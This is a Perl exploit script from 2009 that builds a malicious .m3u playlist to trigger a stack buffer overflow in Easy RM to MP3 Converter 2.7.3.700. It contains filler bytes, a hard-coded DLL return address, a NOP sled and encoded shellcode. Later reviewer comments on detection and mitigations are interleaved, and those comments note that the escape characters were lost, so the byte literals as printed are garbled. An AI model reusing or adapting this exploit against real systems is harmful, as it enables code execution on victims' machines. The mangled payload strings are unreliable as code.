# Title : Easy RM to MP3 Converter 2.7.3.700 (.m3u) Universal BOF Exploit
# Published : 2009-07-16
# Author : Crazy_Hacker
#!/usr/bin/perl
# Easy RM to MP3 Converter 2.7.3.700 (.m3u) File Universal Buffer Overflow Exploit
# Author: Crazy_Hacker
# Download : http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe
# Tested : Windows XP SP2 (En)
# Greetz : Thugz_Hacker,Syrian Hacker,Golden_z3ro,Managerplay
# Home : www.sec-t.com
# viva Xhackers Team ;)
# welcome back Milw0rm
# Proof-of-concept generator: writes a playlist file (Exploit.m3u) whose entire
# content is filler + a 4-byte address + a short NOP run + a payload, in that
# order (see the concatenation into $exploit below).
# NOTE(review): the string escapes on this page appear to have lost their
# backslashes during extraction, so the literals shown here are not the bytes
# the author intended; read the listing as a description of the file layout.

# Banner only; none of these prints affect the generated file.
print "nn################################################## n";
print "Exploit By : Crazy_Hacker n";
print "Vurnable Pro : Easy RM to MP3 Converter 2.7.3.700 n";
print "Tested on : Windows XP SP2 (En) n";
print "Description : Stack Local Buffer Oveflow n";
print "File type : .m3u n";
print "################################################## n";
# Filler that precedes the overwritten value. The fixed count of 26061 suggests
# the converter copies a playlist entry into a fixed-size stack buffer with no
# length check (the banner calls it a stack buffer overflow) -- presumably the
# offset to the saved return address on the tested build; confirm before
# relying on it.
# Detection angle: a legitimate .m3u has short path/URL lines; a single entry
# tens of kilobytes long made of one repeated byte is a strong anomaly.
$junk = "x41" x 26061;
# Hard-coded 4-byte address the author attributes to a DLL shipped with the
# application. It is only usable while that module loads at a fixed base, so
# ASLR (/DYNAMICBASE) on the module removes the "universal" property.
$ret = "x0Fx3FxA1x01"; # => Universal Address (MSRMCcodec02.dll)
# Short run of the x86 NOP opcode placed ahead of the payload (20 repetitions).
$nopsled = "x90" x 20;
# Per the author's note below, the payload only launches calc as a
# demonstration. It is encoder-wrapped, so byte-signature matching on the
# payload is unreliable; anchor detection on the file structure instead.
# Running code from the stack is what DEP/NX is designed to block.
# windows/exec - 144 bytes thanks to metasploit Encoder: x86/shikata_ga_nai EXITFUNC=seh, CMD=calc
$shellcode =
"xdbxdfxbdxe4x47x45x20xd9x74x24xf4x5fx33xc9" .
"xb1x1ex83xefxfcx31x6fx14x03x6fxf0xa5xb0xdc" .
"x10x6dx3bx1dxe0xe5x7ex21x6bx85x85x21x6ax99" .
"x0dx9ex74xeex4dx01x85x1bx38xcaxb1x50xbax22" .
"x88xa6x24x16x6exe6x23x60xafx2dxc6x6fxedx59" .
"x2dx54xa5xb9xcaxdexa0x49x8dx04x2bxa5x54xce" .
"x27x72x12x8fx2bx85xcfxbbx4fx0ex0ex57xe6x4c" .
"x35xa3x3bx33x04x5dxdbx9ax02x2ax5dx13x40x6c" .
"x6dxd8x26x71xc0x55xaex81x93x92xacx52xc9x32" .
"xdbxa2x87xb7x44x2bx0fx49xf0xa5x78x49xe2xd9" .
"xe7xd9x8ex1d";
# File layout: filler, then the address, then the NOP run, then the payload.
$exploit = $junk.$ret.$nopsled.$shellcode;
print "n[+] Creating Exploit File ...n";
# NOTE(review): two-argument open with the mode inside the string, and the
# return value is not checked; if the file cannot be created the print and
# close below fail without any message and the success line is still printed.
open($cc ,">Exploit.m3u");
print $cc $exploit;
close($cc);
print "[+] Exploit File Created (Exploit.m3u)n";